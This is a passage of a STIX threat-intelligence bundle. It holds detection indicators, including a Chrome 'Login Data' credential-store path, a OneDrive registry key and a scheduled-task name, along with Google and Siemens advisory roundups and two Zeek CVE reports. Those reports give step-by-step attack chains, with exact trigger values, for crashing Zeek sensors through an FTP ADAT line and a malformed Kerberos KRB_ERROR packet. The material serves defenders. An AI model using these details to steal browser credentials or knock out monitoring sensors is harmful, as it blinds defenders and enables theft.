      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: *\\temp\\*",
      "pattern": "[x-ti-bot:file_path = '*\\temp\\*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c436b102-ff94-54a9-900a-e0f12a8d3d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--5570e157-3c6e-56f7-928d-f502afc1eb20"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--860fae32-4271-5380-8d4a-3272d617e778",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",
      "pattern": "[url:value = 'https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2770f07-4bd6-5914-a68c-09f96abb0d8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--860fae32-4271-5380-8d4a-3272d617e778"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f45ff71c-38db-5d2a-9811-cb1b39840860",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: *\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
      "pattern": "[x-ti-bot:file_path = '*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dc0aa06b-f6a1-593e-a400-723e6408097b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--f45ff71c-38db-5d2a-9811-cb1b39840860"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a82240df-fe21-528f-945d-22093957317e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://x.com/suyog41/status/1825869470323056748",
      "pattern": "[url:value = 'https://x.com/suyog41/status/1825869470323056748']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5fd7c056-e70b-5e00-a15c-1802fa1736b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--a82240df-fe21-528f-945d-22093957317e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c2ba4091-7bc3-5e28-844f-15a042916acf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://g0njxa.medium.com/from-vietnam-to-united-states-malware-fraud-and-dropshipping-98b7a7b2c36d",
      "pattern": "[url:value = 'https://g0njxa.medium.com/from-vietnam-to-united-states-malware-fraud-and-dropshipping-98b7a7b2c36d']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15423f36-0733-5973-a980-1da648f957e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--c2ba4091-7bc3-5e28-844f-15a042916acf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a9a0927e-ad0a-5d0c-b98a-3d9ad874ab01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: apps.googleusercontent.com",
      "pattern": "[domain-name:value = 'apps.googleusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfaf5801-98e6-5172-9100-bd2104dd2854",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--a9a0927e-ad0a-5d0c-b98a-3d9ad874ab01"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8bb86c19-7f92-5365-bd39-eb8443352254",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://support.google.com/a/answer/175197",
      "pattern": "[url:value = 'https://support.google.com/a/answer/175197']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af88b35b-0046-52ba-9655-1bbd7cb82c2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--8bb86c19-7f92-5365-bd39-eb8443352254"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--82155023-24b7-5001-b042-554d4d4a53e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://support.google.com/a/answer/7587183",
      "pattern": "[url:value = 'https://support.google.com/a/answer/7587183']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec1686b7-ce76-5c50-b22b-792308dfc412",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--82155023-24b7-5001-b042-554d4d4a53e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--24d0e888-9fbe-5455-92c7-bc24a4c1055b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://support.google.com/a/answer/7061566",
      "pattern": "[url:value = 'https://support.google.com/a/answer/7061566']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d60b1d0-8cde-505c-8b77-b1d125ba8ffa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--24d0e888-9fbe-5455-92c7-bc24a4c1055b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2b1ebf36-5184-5508-bd94-5b16a2fbd9b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html",
      "pattern": "[url:value = 'https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27d7e4ce-e98f-500c-8c4c-023e8dfbed74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--2b1ebf36-5184-5508-bd94-5b16a2fbd9b4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--68505e23-d7af-5f36-a7cc-fdd5abd85d99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one",
      "pattern": "[url:value = 'https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c6549589-33c3-5157-8fd9-b8db25a1d1fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--68505e23-d7af-5f36-a7cc-fdd5abd85d99"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0f5261e4-e2aa-5e5d-9bc7-e55e71b6f992",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.elastic.co/security-labs/google-workspace-attack-surface-part-two",
      "pattern": "[url:value = 'https://www.elastic.co/security-labs/google-workspace-attack-surface-part-two']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:41:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76a27232-0137-5476-8754-5f0f4320eea5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "target_ref": "indicator--0f5261e4-e2aa-5e5d-9bc7-e55e71b6f992"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8c1b79a1-13d9-5018-b1de-bcecdb08bf1d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Google Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Google security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Google's July 2026 security updates.\n",
      "published": "2026-07-03T10:41:13Z",
      "labels": [
        "roundup"
      ],
      "object_refs": [
        "indicator--0a2eb9fe-594f-5c0b-b04f-7afca4f0765a",
        "indicator--a67f9191-8188-58fb-bf2e-0e31c5f26d3b",
        "indicator--d22a4104-2479-5b13-bf8d-c9d0e8f63cdf",
        "indicator--e5925146-4959-59d3-a680-467c0fc1c38f",
        "indicator--809a1210-48b1-5c94-ba8d-b012de0382ef",
        "indicator--5570e157-3c6e-56f7-928d-f502afc1eb20",
        "indicator--860fae32-4271-5380-8d4a-3272d617e778",
        "indicator--f45ff71c-38db-5d2a-9811-cb1b39840860",
        "indicator--a82240df-fe21-528f-945d-22093957317e",
        "indicator--c2ba4091-7bc3-5e28-844f-15a042916acf",
        "indicator--a9a0927e-ad0a-5d0c-b98a-3d9ad874ab01",
        "indicator--8bb86c19-7f92-5365-bd39-eb8443352254",
        "indicator--82155023-24b7-5001-b042-554d4d4a53e9",
        "indicator--24d0e888-9fbe-5455-92c7-bc24a4c1055b",
        "indicator--2b1ebf36-5184-5508-bd94-5b16a2fbd9b4",
        "indicator--68505e23-d7af-5f36-a7cc-fdd5abd85d99",
        "indicator--0f5261e4-e2aa-5e5d-9bc7-e55e71b6f992"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rm3j-f69w-wqmq"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vgwf-h737-ff37"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-jppx-rxg9-jmrx"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-q675-qj96-32m9"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/headless_browser_usage.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_browser_process_launched_with_unusual_flags.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_chromium_browser_no_security_sandbox_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_chromium_browser_with_custom_user_data_directory.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_credentials_from_password_stores_chrome_copied_in_temp_dir.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_credentials_from_password_stores_chrome_extension_access.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_credentials_from_password_stores_chrome_localstate_access.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_credentials_from_password_stores_chrome_login_data_access.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_disable_or_stop_browser_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/initial_access_google_workspace_login_impossible_travel.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/credential_access_gcp_gke_secret_access_suspicious_user_agent.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/credential_access_gcp_gke_secrets_list_unusual_source_asn.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/discovery_gcp_gke_api_request_failure_burst.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/discovery_gcp_gke_suspicious_self_subject_review.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/execution_gcp_gke_user_exec_into_pod.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/persistence_gcp_gke_admission_webhook_created_or_modified.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/persistence_gcp_gke_cluster_admin_role_binding.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/privilege_escalation_gcp_gke_excessive_linux_capabilities.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/privilege_escalation_gcp_gke_pod_host_network.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/privilege_escalation_gcp_gke_pod_host_pid.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/privilege_escalation_gcp_gke_privileged_pod_created.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/privilege_escalation_gcp_gke_sensitive_hostpath_volume.toml"
        },
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/android-security-advisory-july-2026-monthly-rollup-av26-662"
        },
        {
          "source_name": "reference",
          "url": "https://www.darkreading.com/application-security/dialogflow-cx-rogue-agent-flaw-enabled-ai-chatbot-data-theft"
        },
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0848/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3001ba4-90b7-5e9c-80da-68a2293d26f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://cert-portal.siemens.com/productcert/html/ssa-229470.html",
      "pattern": "[url:value = 'https://cert-portal.siemens.com/productcert/html/ssa-229470.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:48:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3bdc53e7-5463-5661-b8b3-e3edd3c07599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9a5b27db-1f0f-512d-9418-4da639954049",
      "target_ref": "indicator--c3001ba4-90b7-5e9c-80da-68a2293d26f2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9a5b27db-1f0f-512d-9418-4da639954049",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Siemens Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Siemens security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Siemens's July 2026 security updates.\n",
      "published": "2026-07-07T16:48:32Z",
      "labels": [
        "roundup"
      ],
      "object_refs": [
        "indicator--c3001ba4-90b7-5e9c-80da-68a2293d26f2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54801"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec88bb6b-ad65-56f8-ab45-78f291bc34e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6a1aaf0d-c2f3-5646-8c6d-064ace54775e",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6a1aaf0d-c2f3-5646-8c6d-064ace54775e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-60108 - Zeek FTP Analyzer Uncontrolled Memory Consumption leading to DoS",
      "description": "## Overview\n\nZeek before 8.0.9 contains an uncontrolled memory consumption vulnerability in the FTP analyzer that allows unauthenticated remote attackers to cause process termination by sending a crafted FTP control session negotiating AUTH GSSAPI followed by a large ADAT control line. Attackers can exploit the NVT_Analyzer component's lack of a maximum line length check, causing it to continuously double its internal buffer without bounds during base64 decoding of an attacker-controlled ADAT token, resulting in denial of service of the Zeek sensor. This vulnerability, tracked as CVE-2026-60108, impacts versions prior to 8.0.9 and poses a significant risk to the availability and stability of network monitoring operations where Zeek sensors are deployed, as it can be triggered remotely without authentication.\n\n## Attack Chain\n\n1. Unauthenticated remote attacker establishes an FTP control connection to a vulnerable Zeek sensor.\n2. Attacker sends a crafted FTP command to initiate GSSAPI authentication negotiation within the session.\n3. Zeek's FTP analyzer, specifically the NVT_Analyzer component, begins processing the GSSAPI authentication.\n4. Attacker sends an excessively large Authentication Data (ADAT) control line within the ongoing FTP control session.\n5. The NVT_Analyzer attempts to base64 decode the large ADAT token without an internal buffer size limit.\n6. The NVT_Analyzer continuously allocates and reallocates memory, doubling its buffer size without bounds, in an attempt to handle the oversized input.\n7. This uncontrolled memory consumption rapidly exhausts the Zeek sensor's available system resources.\n8. The Zeek sensor process terminates unexpectedly, resulting in a complete denial of service for the network monitoring system.\n\n## Impact\n\nThe successful exploitation of CVE-2026-60108 results in the unauthenticated remote termination of the Zeek sensor process. This leads to a denial of service, rendering the Zeek instance incapable of network traffic analysis and security monitoring. For organizations relying on Zeek for critical threat detection, incident response, and compliance logging, this means a complete loss of visibility over network activity during the attack, potentially allowing other malicious activities to go undetected.\n\n## Recommendation\n\n- Patch CVE-2026-60108 immediately by updating all affected Zeek installations to version 8.0.9 or later to address the uncontrolled memory consumption vulnerability.\n",
      "published": "2026-07-09T15:19:23Z",
      "labels": [
        "cve",
        "dos",
        "zeek",
        "network-protocol",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-60108"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2905176-3fbe-514f-8e41-de710bb9fa98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f662b76-7b8f-5f94-9cee-4a445eac470d",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2f662b76-7b8f-5f94-9cee-4a445eac470d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-60109 - Zeek Kerberos Protocol Analyzer Null Pointer Dereference",
      "description": "## Overview\n\nA critical denial-of-service vulnerability, identified as CVE-2026-60109, impacts Zeek versions prior to 8.0.9. This flaw resides within Zeek's Kerberos protocol analyzer, specifically due to a null pointer dereference. Unauthenticated remote attackers can exploit this vulnerability by sending a meticulously crafted `KRB_ERROR` message. The malicious message must contain `error-code 25` (KDC_ERR_PREAUTH_REQUIRED) and include a `PA-DATA` element with `padata-type 2, 3, 11, or 19`. This specific combination triggers a mismatch between the parser and analyzer states, leading `proc_padata()` to dereference an uninitialized `pa_data_element` field. The exploitation requires only a single UDP or TCP packet sent to port 88, without requiring any credentials or prior authentication, and results in the Zeek sensor crashing, effectively causing a denial of service.\n\n## Attack Chain\n\n1. An unauthenticated remote attacker crafts a specialized Kerberos `KRB_ERROR` message.\n2. The crafted message includes `error-code 25`, which corresponds to `KDC_ERR_PREAUTH_REQUIRED`.\n3. Within the `KRB_ERROR` message, a `PA-DATA` element is embedded with a `padata-type` specifically set to `2, 3, 11, or 19`.\n4. The attacker sends this single, malformed UDP or TCP packet to a vulnerable Zeek sensor's port 88.\n5. The Zeek sensor's Kerberos protocol analyzer, `proc_padata()`, attempts to process the incoming `KRB_ERROR` message.\n6. Due to an internal parser and analyzer state mismatch, `proc_padata()` incorrectly dereferences an uninitialized `pa_data_element` field.\n7. This dereference of a null pointer causes a critical error within the Zeek application.\n8. The Zeek sensor application crashes entirely, resulting in a denial-of-service condition for network monitoring and analysis.\n\n## Impact\n\nThe successful exploitation of CVE-2026-60109 leads directly to a denial-of-service (DoS) for the affected Zeek sensor. This means that organizations relying on Zeek for network security monitoring, intrusion detection, or forensic analysis will temporarily lose visibility into their network traffic from the crashed sensor. The impact can be severe for organizations with critical network infrastructure or strict compliance requirements, as it can create blind spots for threat detection and incident response, potentially allowing other malicious activities to go unnoticed while the sensor is offline.\n\n## Recommendation\n\n* Prioritize patching Zeek instances to version 8.0.9 or later immediately to remediate CVE-2026-60109.\n* Monitor network traffic for unusual Kerberos `KRB_ERROR` messages specifically targeting port 88 with `error-code 25` and `PA-DATA` elements containing `padata-type 2, 3, 11, or 19`. While detailed detection requires deep packet inspection, anomalous traffic patterns can be indicators.\n",
      "published": "2026-07-09T15:20:09Z",
      "labels": [
        "vulnerability",
        "network",
        "dos",
        "zeek",
        "kerberos"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-60109"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--566cfba6-30de-5c45-abe5-42e589cad817",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "registry_key: HKCU\\SOFTWARE\\OneDrive\\Environment",
      "pattern": "[x-ti-bot:registry_key = 'HKCU\\SOFTWARE\\OneDrive\\Environment']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T15:51:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23a32418-12b9-5114-8df0-6f8d0067ea3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "indicator--566cfba6-30de-5c45-abe5-42e589cad817"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--62b3012a-61e5-5172-bdb0-50ee00d4ada3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "scheduled_task: OneDrive Update",
      "pattern": "[x-ti-bot:scheduled_task = 'OneDrive Update']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T15:51:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11d497c6-f6ba-50ec-9c51-24f8e72bb642",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "indicator--62b3012a-61e5-5172-bdb0-50ee00d4ada3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d2bc70c6-3c33-57f3-978c-c64c8f91777c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Registry",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1112",
          "url": "https://attack.mitre.org/techniques/T1112"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a1032a0-918d-5f2b-999c-b5a0d948c590",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
